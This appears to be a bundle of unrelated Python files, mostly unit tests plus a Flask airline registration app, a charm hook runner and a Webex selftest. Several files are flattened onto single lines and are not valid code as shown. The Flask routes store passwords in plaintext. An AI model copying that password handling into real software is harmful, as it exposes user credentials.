from kiox.episode import Episode from kiox.step import StepBuffer from kiox.transition_buffer import UnlimitedTransitionBuffer from kiox.transition_factory import ( FrameStackTransitionFactory, SimpleTransitionFactory, ) from .utility import StepFactory def test_simple_transition_factory(): factory = StepFactory() episode = Episode(StepBuffer(), UnlimitedTransitionBuffer()) steps = [] for _ in range(10): steps.append(episode.append_step(factory())) transition_factory = SimpleTransitionFactory() for i in range(10): if i == 9: lazy_transition = transition_factory.create( step=steps[i], next_step=None, episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is None else: lazy_transition = transition_factory.create( step=steps[i], next_step=steps[i + 1], episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is steps[i + 1].idx assert lazy_transition.curr_idx is steps[i].idx assert lazy_transition.multi_step_reward == steps[i].reward assert lazy_transition.duration == 1 def test_frame_stack_transition_factory(): factory = StepFactory(observation_shape=(1, 84, 84)) episode = Episode(StepBuffer(), UnlimitedTransitionBuffer()) steps = [] for _ in range(10): steps.append(episode.append_step(factory())) transition_factory = FrameStackTransitionFactory(n_frames=3) for i in range(10): if i == 9: lazy_transition = transition_factory.create( step=steps[i], next_step=None, episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is None else: lazy_transition = transition_factory.create( step=steps[i], next_step=steps[i + 1], episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is steps[i + 1].idx prev_frames = [step.idx for step in steps[max(i - 2, 0) : i]] assert lazy_transition.curr_idx is steps[i].idx assert lazy_transition.multi_step_reward == steps[i].reward assert lazy_transition.duration == 1 assert lazy_transition.prev_frames == prev_frames
nilq/baby-python
python
from flask import Flask, render_template, request, session, url_for, redirect
import pymysql.cursors
from appdef import app, conn

@app.route('/registerCustomer')
def registerCustomer():
    return render_template('registerCustomer.html')

# Authenticates the registration
@app.route('/registerAuthCustomer', methods=['GET', 'POST'])
def registerAuthCustomer():
    # grabs information from the forms
    email = request.form['email']
    name = request.form['name']
    password = request.form['password']
    building_number = request.form['building_number']
    street = request.form['street']
    city = request.form['city']
    state = request.form['state']
    phone_number = request.form['phone_number']
    passport_number = request.form['passport_number']
    passport_expiration = request.form['passport_expiration']
    passport_country = request.form['passport_country']
    date_of_birth = request.form['date_of_birth']

    # cursor used to send queries
    cursor = conn.cursor()
    # executes query
    query = 'SELECT * FROM customer WHERE email = %s'
    cursor.execute(query, (email,))
    # stores the results in a variable
    data = cursor.fetchone()
    # use fetchall() if you are expecting more than 1 data row
    error = None
    if data:
        # If the previous query returns data, then the user already exists
        error = "This user already exists"
        return render_template('registerCustomer.html', error=error)
    else:
        ins = 'INSERT INTO customer VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
        cursor.execute(ins, (email, name, password, building_number, street, city, state, phone_number, passport_number, passport_expiration, passport_country, date_of_birth))
        conn.commit()
        cursor.close()
        return render_template('index.html')

# Define route for register
@app.route('/registerAgent')
def registerAgent():
    return render_template('registerAgent.html')

@app.route('/registerAuthAgent', methods=['GET', 'POST'])
def registerAuthAgent():
    email = request.form['email']
    password = request.form['password']
    booking_agent_id = request.form['booking_agent_id']
    cursor = conn.cursor()
    query = 'SELECT * FROM booking_agent WHERE email = %s'
    cursor.execute(query, (email,))
    data = cursor.fetchone()
    error = None
    if data:
        error = "This user already exists"
        return render_template('registerAgent.html', error=error)
    else:
        ins = 'INSERT INTO booking_agent VALUES(%s, %s, %s)'
        cursor.execute(ins, (email, password, booking_agent_id))
        conn.commit()
        cursor.close()
        # do not close the shared module-level connection here; later
        # requests reuse it
        return render_template('index.html')

@app.route('/registerStaff')
def registerStaff():
    return render_template('registerStaff.html')

@app.route('/registerAuthStaff', methods=['GET', 'POST'])
def registerAuthStaff():
    username = request.form['username']
    password = request.form['password']
    first_name = request.form['first_name']
    last_name = request.form['last_name']
    date_of_birth = request.form['date_of_birth']
    airline_name = request.form['airline_name']
    cursor = conn.cursor()
    query = 'SELECT * FROM airline_staff WHERE username = %s'
    cursor.execute(query, (username,))
    data = cursor.fetchone()
    error = None
    if data:
        error = "This user already exists"
        return render_template('registerStaff.html', error=error)
    else:
        ins = 'INSERT INTO airline_staff VALUES(%s, %s, %s, %s, %s, %s)'
        cursor.execute(ins, (username, password, first_name, last_name, date_of_birth, airline_name))
        conn.commit()
        cursor.close()
        # keep the shared connection open for subsequent requests
        return render_template('index.html')
nilq/baby-python
python
from spaceone.inventory.connector.aws_sqs_connector.connector import SQSConnector
nilq/baby-python
python
#!/usr/bin/env python # Copyright 2014-2015 Canonical Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys import subprocess from charmhelpers.core import hookenv def default_execd_dir(): return os.path.join(os.environ['CHARM_DIR'], 'exec.d') def execd_module_paths(execd_dir=None): """Generate a list of full paths to modules within execd_dir.""" if not execd_dir: execd_dir = default_execd_dir() if not os.path.exists(execd_dir): return for subpath in os.listdir(execd_dir): module = os.path.join(execd_dir, subpath) if os.path.isdir(module): yield module def execd_submodule_paths(command, execd_dir=None): """Generate a list of full paths to the specified command within exec_dir. """ for module_path in execd_module_paths(execd_dir): path = os.path.join(module_path, command) if os.access(path, os.X_OK) and os.path.isfile(path): yield path def execd_run(command, execd_dir=None, die_on_error=True, stderr=subprocess.STDOUT): """Run command for each module within execd_dir which defines it.""" for submodule_path in execd_submodule_paths(command, execd_dir): try: subprocess.check_output(submodule_path, stderr=stderr, universal_newlines=True) except subprocess.CalledProcessError as e: hookenv.log("Error ({}) running {}. Output: {}".format( e.returncode, e.cmd, e.output)) if die_on_error: sys.exit(e.returncode) def execd_preinstall(execd_dir=None): """Run charm-pre-install for each module within execd_dir.""" execd_run('charm-pre-install', execd_dir=execd_dir)
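
# Minimal usage sketch (assumes CHARM_DIR is set in the environment, as the
# charm runtime normally guarantees): list every executable
# 'charm-pre-install' hook that execd_preinstall() would run, without
# actually executing anything.
if __name__ == '__main__':
    for module_hook in execd_submodule_paths('charm-pre-install'):
        print(module_hook)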
nilq/baby-python
python
"""Test the `crc` main function.""" from crc.bin.crc3 import crc import os import pytest # noqa: F401 import sys TEST_FILES_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), 'files')) TEST_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests')) def test_crc(): """Test crc functionality.""" crc( '{}/test_enhancers.bed'.format(TEST_FILES_DIR), 'HG19', '{}/Chromosomes/'.format(TEST_FILES_DIR), TEST_DIR, 'test', subpeak_file='{}/mock_regions.bed'.format(TEST_FILES_DIR), ) scores = [] with open(os.path.join(TEST_DIR, 'test_CLIQUE_SCORES_DEGREE.txt')) as infile: for line in infile: scores.append(float(line.split('\t')[1].strip('\n'))) if (sys.version_info > (3, 0)): test_scores = [8.25, 8.0, 7.75, 7.333333333333333] else: test_scores = [8.25, 8.0, 7.75, 7.33333333333] assert scores == test_scores, 'Clique scores do not match!'
nilq/baby-python
python
import os
from collections import namedtuple
from typing import List, TypedDict

FIT_URL = 'https://raw.githubusercontent.com/notemptylist/shinko/main/modelfits/arima/'
FIT_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'modelfits', 'arima')
FitSpec = namedtuple('FitSpec', ['stream', 'numlags', 'todo', 'results', 'tstamp'])
fitspec_version = '0.1'

class fitresult(TypedDict):
    order: tuple
    rmse: float
    mean: float
    tstamp: float

class fitspec(TypedDict):
    stream: str
    numlags: int
    todo: List[tuple]
    results: List[fitresult]
    version: str

def make_spec():
    s: fitspec = {'stream': '',
                  'numlags': 0,
                  'todo': [],
                  'results': [],
                  'version': fitspec_version
                  }
    return s

if __name__ == "__main__":
    import json
    fs: fitspec = {'stream': 'foo.json',
                   'numlags': 400,
                   'todo': [(0, 0, 1), (1, 6, 0)],
                   'results': [
                       {'order': (1, 1, 1),
                        'rmse': .90,
                        'mean': .20,
                        'tstamp': 12312312312
                        },
                   ],
                   'version': fitspec_version
                   }
    print(fs)
    print(isinstance(fs, dict))
    with open('foo.json', 'w') as fp:
        json.dump(fs, fp)
    with open('foo.json', 'r') as fp:
        foo = json.load(fp)
    print(foo)
    print(isinstance(foo, dict))
nilq/baby-python
python
import os

v = os.environ.get('SOME_KEY')
if v is not None and v.strip():  # get() returns None for a missing key
    print(v)
nilq/baby-python
python
# -*- coding: utf-8 -*- # ***************************************************************************** # Copyright (c) 2020, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ***************************************************************************** import numba import numpy as np import pandas as pd import unittest from itertools import (combinations_with_replacement, product, ) from sdc.tests.indexes.index_datagens import ( test_global_index_names, _generate_valid_int64_index_data, _generate_int64_indexes_fixed, get_sample_index, ) from sdc.tests.test_base import TestCase from sdc.datatypes.indexes import * class TestInt64Index(TestCase): def test_int64_index_type_inferred(self): for data in _generate_valid_int64_index_data(): for name in test_global_index_names: index = pd.Int64Index(data, name=name) with self.subTest(index=index): native_index_type = numba.typeof(index) self.assertIsInstance(native_index_type, Int64IndexType) def test_int64_index_create_and_box(self): def test_impl(data, name): return pd.Int64Index(data, name=name) sdc_func = self.jit(test_impl) name = 'index' for data in _generate_valid_int64_index_data(): with self.subTest(index_data=data): result = sdc_func(data, name) result_ref = test_impl(data, name) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_unbox_and_box(self): def test_impl(index): return index sdc_func = self.jit(test_impl) n = 11 for index in _generate_int64_indexes_fixed(n): with self.subTest(index=index): result = sdc_func(index) result_ref = test_impl(index) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_create_param_copy_true(self): def test_impl(arr): return pd.Int64Index(arr, copy=True) sdc_func = self.jit(test_impl) index_data_to_test = [ np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64), list(np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64)), pd.RangeIndex(11), pd.Int64Index([1, 2, 3, 5, 6, 3, 4]), ] for index_data in index_data_to_test: with self.subTest(index_data=index_data): result = sdc_func(index_data) result_ref = test_impl(index_data) pd.testing.assert_index_equal(result, result_ref) self.assertEqual(result._data is result_ref._data, False) def test_int64_index_create_param_copy_default(self): def test_impl(arr): return pd.Int64Index(arr) sdc_func = 
self.jit(test_impl) # only test data that has underlying array that can be referenced # and ensure it has int64 dtype as otherwise there will always be a copy index_data_to_test = [ np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64), pd.Int64Index([1, 2, 3, 5, 6, 3, 4]), ] for index_data in index_data_to_test: with self.subTest(index_data=index_data): result = sdc_func(index_data) result_ref = test_impl(index_data) pd.testing.assert_index_equal(result, result_ref) self.assertEqual(result._data is result_ref._data, True) def test_int64_index_create_param_dtype(self): def test_impl(n, dtype): return pd.Int64Index(np.arange(n), dtype=dtype) sdc_func = self.jit(test_impl) n = 11 supported_dtypes = [None, np.int64, 'int64', np.int32, 'int32'] for dtype in supported_dtypes: with self.subTest(dtype=dtype): result = sdc_func(n, dtype) result_ref = test_impl(n, dtype) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_create_param_dtype_invalid(self): def test_impl(n, dtype): return pd.Int64Index(np.arange(n), dtype=dtype) sdc_func = self.jit(test_impl) n = 11 invalid_dtypes = ['float', 'uint'] for dtype in invalid_dtypes: with self.subTest(dtype=dtype): with self.assertRaises(Exception) as context: test_impl(n, dtype) pandas_exception = context.exception with self.assertRaises(type(pandas_exception)) as context: sdc_func(n, dtype) sdc_exception = context.exception self.assertIn(str(sdc_exception), str(pandas_exception)) def test_int64_index_attribute_dtype(self): def test_impl(index): return index.dtype sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_attribute_name(self): def test_impl(index): return index.name sdc_func = self.jit(test_impl) n = 11 index_data = np.arange(n) * 2 for name in test_global_index_names: with self.subTest(name=name): index = pd.Int64Index(index_data, name=name) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_len(self): def test_impl(index): return len(index) sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2, name='index') result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_attribute_values(self): def test_impl(index): return index.values sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data) with self.subTest(index_data=data): result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_contains(self): def test_impl(index, value): return value in index sdc_func = self.jit(test_impl) index = pd.Int64Index([1, 11, 2]) values_to_test = [-5, 15, 1, 11, 5, 6] for value in values_to_test: with self.subTest(value=value): result = sdc_func(index, value) result_ref = test_impl(index, value) np.testing.assert_array_equal(result, result_ref) def test_int64_index_copy(self): def test_impl(index, new_name): return index.copy(name=new_name) sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): for name, new_name in product(test_global_index_names, repeat=2): index = pd.Int64Index(data, name=name) with self.subTest(index=index, new_name=new_name): result = sdc_func(index, new_name) result_ref = test_impl(index, new_name) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_copy_param_deep(self): def test_impl(index, 
deep): return index.copy(deep=deep) sdc_func = self.jit(test_impl) index = pd.Int64Index([1, 11, 2]) for deep in [True, False]: with self.subTest(deep=deep): result = sdc_func(index, deep) result_ref = test_impl(index, deep) pd.testing.assert_index_equal(result, result_ref) self.assertEqual( result._data is index._data, result_ref._data is index._data ) def test_int64_index_getitem_scalar(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data) n = len(index) values_to_test = [-n, n // 2, n - 1] for idx in values_to_test: with self.subTest(index=index, idx=idx): result = sdc_func(index, idx) result_ref = test_impl(index, idx) self.assertEqual(result, result_ref) def test_int64_index_getitem_scalar_idx_bounds(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2, name='abc') values_to_test = [-(n + 1), n] for idx in values_to_test: with self.subTest(idx=idx): with self.assertRaises(Exception) as context: test_impl(index, idx) pandas_exception = context.exception with self.assertRaises(type(pandas_exception)) as context: sdc_func(index, idx) sdc_exception = context.exception self.assertIsInstance(sdc_exception, type(pandas_exception)) self.assertIn("out of bounds", str(sdc_exception)) def test_int64_index_getitem_slice(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n = 17 slices_params = combinations_with_replacement( [None, 0, -1, n // 2, n, n - 3, n + 3, -(n + 3)], 2 ) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data, name='abc') for slice_start, slice_stop in slices_params: for slice_step in [1, -1, 2]: idx = slice(slice_start, slice_stop, slice_step) with self.subTest(index=index, idx=idx): result = sdc_func(index, idx) result_ref = test_impl(index, idx) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_iterator_1(self): def test_impl(index): res = [] for i, label in enumerate(index): res.append((i, label)) return res sdc_func = self.jit(test_impl) index = pd.Int64Index([5, 3, 2, 1, 7, 4]) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_iterator_2(self): def test_impl(index): res = [] for label in index: if not label % 2: res.append(label) return res sdc_func = self.jit(test_impl) index = pd.Int64Index([5, 3, 2, 1, 7, 4]) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_nparray(self): def test_impl(index): return np.array(index) sdc_func = self.jit(test_impl) n = 11 index = get_sample_index(n, Int64IndexType) result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_index(self): def test_impl(index1, index2): return index1 == index2 sdc_func = self.jit(test_impl) n = 11 for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2): with self.subTest(index1=index1, index2=index2): result = np.asarray(sdc_func(index1, index2)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(index1, index2) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_scalar(self): def test_impl(A, B): return A == B sdc_func = self.jit(test_impl) n = 11 A = pd.Int64Index(np.arange(n) * 2) scalars_to_test = [0, 22, 13, -5, 4.0] for B in scalars_to_test: for swap_operands in (False, True): if 
swap_operands: A, B = B, A with self.subTest(left=A, right=B): result = np.asarray(sdc_func(A, B)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(A, B) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_nparray(self): def test_impl(A, B): return A == B sdc_func = self.jit(test_impl) n = 11 for A, B in product( _generate_int64_indexes_fixed(n), map(lambda x: np.array(x), _generate_int64_indexes_fixed(n)) ): for swap_operands in (False, True): if swap_operands: A, B = B, A with self.subTest(left=A, right=B): result = np.asarray(sdc_func(A, B)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(A, B) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_ne_index(self): def test_impl(index1, index2): return index1 != index2 sdc_func = self.jit(test_impl) n = 11 for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2): with self.subTest(index1=index1, index2=index2): result = np.asarray(sdc_func(index1, index2)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(index1, index2) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_is_nounbox(self): # positive testcase def test_impl_1(data, name): index1 = pd.Int64Index(data, name=name) index2 = index1 return index1 is index2 # negative testcase def test_impl_2(data, name): index1 = pd.Int64Index(data, name=name) index2 = pd.Int64Index(data, name=name) return index1 is index2 index_data = pd.Int64Index([1, 2, 3, 5, 6, 3, 4]).values compiled_funcs = [ (test_impl_1, "same indexes"), (test_impl_2, "not same indexes") ] for pyfuncs, name in product(compiled_funcs, test_global_index_names): func, descr = pyfuncs sdc_func = self.jit(func) with self.subTest(subtest=f"{descr}, name={name}"): result = sdc_func(index_data, name) result_ref = func(index_data, name) expected = True if descr == "same indexes" else False self.assertEqual(result, result_ref) self.assertEqual(result, expected) def test_int64_index_getitem_by_mask(self): def test_impl(index, mask): return index[mask] sdc_func = self.jit(test_impl) n = 11 np.random.seed(0) mask = np.random.choice([True, False], n) for index in _generate_int64_indexes_fixed(n): result = sdc_func(index, mask) result_ref = test_impl(index, mask) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_getitem_by_array(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n, k = 11, 7 np.random.seed(0) idx = np.random.choice(np.arange(n), k) for index in _generate_int64_indexes_fixed(n): result = sdc_func(index, idx) result_ref = test_impl(index, idx) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_reindex_equal_indexes(self): def test_func(index1, index2): return index1.reindex(index2) sdc_func = self.jit(test_func) n = 10 np.random.seed(0) index1 = pd.Int64Index(np.arange(n)) index2 = pd.Int64Index(np.copy(index1.values)) result = sdc_func(index1, index2) result_ref = test_func(index1, index2) pd.testing.assert_index_equal(result[0], result_ref[0]) np.testing.assert_array_equal(result[1], result_ref[1]) def test_int64_index_reindex(self): def test_impl(index1, index2): return index1.reindex(index2) sdc_func = self.jit(test_impl) n = 10 np.random.seed(0) index_data = np.arange(n) index1 = pd.Int64Index(np.random.choice(index_data, n, replace=False)) reindex_by = [ pd.RangeIndex(n + 2), pd.RangeIndex(0, n, 2), pd.Int64Index(np.random.choice(index_data, n, replace=False)), pd.Int64Index(np.random.choice([0, 1, 11, 12, 
100], n)) ] for index2 in reindex_by: with self.subTest(index2=index2): result = sdc_func(index1, index2) result_ref = test_impl(index1, index2) pd.testing.assert_index_equal(result[0], result_ref[0]) np.testing.assert_array_equal(result[1], result_ref[1]) def test_int64_index_equals(self): def test_impl(index1, index2): return index1.equals(index2) sdc_func = self.jit(test_impl) n = 11 indexes_to_test = [ pd.Int64Index(np.arange(n)), pd.Int64Index(np.arange(n), name='asd'), pd.Int64Index(np.arange(n) * 2, name='asd'), pd.Int64Index(np.arange(2 * n)), ] for index1, index2 in combinations_with_replacement(indexes_to_test, 2): with self.subTest(index1=index1, index2=index2): result = sdc_func(index1, index2) result_ref = test_impl(index1, index2) self.assertEqual(result, result_ref) def test_int64_index_ravel(self): def test_impl(index): return index.ravel() sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2) result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_take(self): def test_impl(index, value): return index.take(value) sdc_func = self.jit(test_impl) n = 11 np.random.seed(0) index_pos = np.arange(n) values_to_test = [ np.random.choice(index_pos, 2*n), list(np.random.choice(index_pos, n, replace=False)), pd.RangeIndex(n // 2), pd.Int64Index(index_pos[n // 2:]) ] for index, value in product(_generate_int64_indexes_fixed(n), values_to_test): with self.subTest(index=index, value=value): result = sdc_func(index, value) result_ref = test_impl(index, value) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_append(self): def test_impl(index, other): return index.append(other) sdc_func = self.jit(test_impl) n = 11 other_indexes = [ get_sample_index(n, PositionalIndexType), get_sample_index(n, RangeIndexType), get_sample_index(n, Int64IndexType), ] for index, other in product( _generate_int64_indexes_fixed(n), other_indexes): with self.subTest(index=index, other=other): result = sdc_func(index, other) result_ref = test_impl(index, other) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_join(self): def test_impl(index, other): return index.join(other, 'outer', return_indexers=True) sdc_func = self.jit(test_impl) n = 11 other_indexes = [ get_sample_index(2 * n, PositionalIndexType), get_sample_index(2 * n, RangeIndexType), get_sample_index(2 * n, Int64IndexType), ] for index, other in product( _generate_int64_indexes_fixed(n), other_indexes): with self.subTest(index=index, other=other): result = sdc_func(index, other) result_ref = test_impl(index, other) # check_names=False, since pandas behavior is not type-stable pd.testing.assert_index_equal(result[0], result_ref[0], check_names=False) np.testing.assert_array_equal(result[1], result_ref[1]) np.testing.assert_array_equal(result[2], result_ref[2]) if __name__ == "__main__": unittest.main()
nilq/baby-python
python
# (c) Copyright IBM Corp. 2010, 2021. All Rights Reserved.
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
"""Function implementation"""
import datetime
import logging
from resilient_lib import validate_fields, RequestsCommon
from fn_create_webex_meeting.lib.cisco_api import WebexAPI

PACKAGE_NAME = "fn_create_webex_meeting"

log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler())

def selftest_function(opts):
    """
    Placeholder for selftest function. An example use would be to test package api connectivity.
    Suggested return values are unimplemented, success, or failure.
    """
    options = opts.get(PACKAGE_NAME, {})
    required_fields = ["webex_email", "webex_password", "webex_site_url", "webex_timezone"]
    validate_fields(required_fields, options)
    opts = dict()
    opts["rc"] = RequestsCommon(opts, options)
    opts["webex_site_url"] = options.get("webex_site_url")
    opts["email"] = options.get("webex_email")
    opts["password"] = options.get("webex_password")
    opts["sitename"] = options.get("webex_site")
    opts["timezone"] = options.get("webex_timezone")
    opts["meeting_password"] = "Selftest23#"
    opts["meeting_name"] = "SelfTest Meeting"
    opts["meeting_agenda"] = "Agenda"

    # Compute meeting start/end times one day in the future, in epoch
    # milliseconds. Use an aware UTC datetime: calling .timestamp() on a
    # naive utcnow() value would be interpreted as local time.
    now = datetime.datetime.now(datetime.timezone.utc)
    meeting_start = now + datetime.timedelta(days=1)
    meeting_end = meeting_start + datetime.timedelta(minutes=10)
    webex_meeting_start_time = int(meeting_start.timestamp() * 1000)
    webex_meeting_end_time = int(meeting_end.timestamp() * 1000)

    try:
        webex = WebexAPI(opts, webex_meeting_start_time, webex_meeting_end_time)
        response = webex.create_meeting()
        if response.get("status") == "SUCCESS":
            return {"state": "success", "reason": "success"}
        else:
            return {"state": "failure", "reason": response.get("fail_reason")}
    except Exception as err:
        return {"state": "failure", "reason": err}
nilq/baby-python
python
# Copyright (C) 2016 Intel Corporation # # SPDX-License-Identifier: MIT from .pip import Pip class IDP201700(Pip): _python_path = '/miniconda3/envs/idp2017.0.0/bin/python'
nilq/baby-python
python
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from openstack.tests.unit.test_proxy_base3 import BaseProxyTestCase from openstack.volume_backup.v2 import _proxy from openstack.volume_backup.v2 import backup as _backup from openstack.volume_backup.v2 import backup_policy as _backup_policy from openstack.volume_backup import volume_backup_service class TestVolumeBackupProxy(BaseProxyTestCase): def __init__(self, *args, **kwargs): super(TestVolumeBackupProxy, self).__init__( *args, proxy_class=_proxy.Proxy, service_class=volume_backup_service.VolumeBackupService, **kwargs) class TestCloudBackup(TestVolumeBackupProxy): def __init__(self, *args, **kwargs): super(TestCloudBackup, self).__init__(*args, **kwargs) def test_create_backup(self): self.mock_response_json_values({ "id": "70a599e0-31e7-49b7-b260-868f441e862b" }) data = { "name": "backup1", "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "description": "Backups_Demon" } job = self.proxy.create_backup(**data) expect_post_json = { "backup": { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "name": "backup1", "description": "Backups_Demon" } } self.assert_session_post_with("/cloudbackups", json=expect_post_json) self.assertIsInstance(job, _backup.CloudBackup) self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id) def test_create_native_backup(self): self.mock_response_json_file_values( "create_native_backup_response.json") data = { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389", "name": "backup1", "description": "Backup_Demo" } backup = self.proxy.create_native_backup(**data) expect_post_json = { "backup": { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389", "name": "backup1", "description": "Backup_Demo" } } self.assert_session_post_with("/backups", json=expect_post_json) self.assertIsInstance(backup, _backup.Backup) self.assertEqual("54ba0e69-48a0-4a77-9cdf-a7979a7e2648", backup.id) self.assertEqual("backup1", backup.name) def test_delete_backup_with_id(self): self.proxy.delete_backup("some-backup-id") self.assert_session_delete("backups/some-backup-id") def test_delete_backup_with_instance(self): self.proxy.delete_backup(_backup.Backup(id="some-backup-id")) self.assert_session_delete("backups/some-backup-id") def test_restore_backup(self): self.mock_response_json_values({ "id": "70a599e0-31e7-49b7-b260-868f441e862b" }) job = self.proxy.restore_backup( "some-backup-id", "c96e4a94-927a-425c-8795-63f9964cfebd") expect_post_json = { "restore": { "volume_id": "c96e4a94-927a-425c-8795-63f9964cfebd" } } self.assert_session_post_with( "cloudbackups/some-backup-id/restore", json=expect_post_json) self.assertIsInstance(job, _backup.CloudBackup) self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id) def test_list_backup(self): query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.mock_response_json_file_values("list_backups.json") backups = 
list(self.proxy.backups(**query)) transferred_query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.assert_session_list_with("/backups", params=transferred_query) self.assertEqual(2, len(backups)) backup = backups[0] self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertIsNone(backup.name) def test_list_backup_detail(self): query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.mock_response_json_file_values("list_backup_details.json") backups = list(self.proxy.backups(details=True, **query)) transferred_query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.assert_session_list_with("/backups/detail", params=transferred_query) self.assertEqual(3, len(backups)) backup = backups[0] self.assertIsInstance(backup, _backup.BackupDetail) self.assertEqual("error", backup.status) self.assertIsNone(backup.description) self.assertIsNone(backup.availability_zone) self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024", backup.volume_id) self.assertEqual(("Connection to swift failed: " "[Errno 111] ECONNREFUSED"), backup.fail_reason) 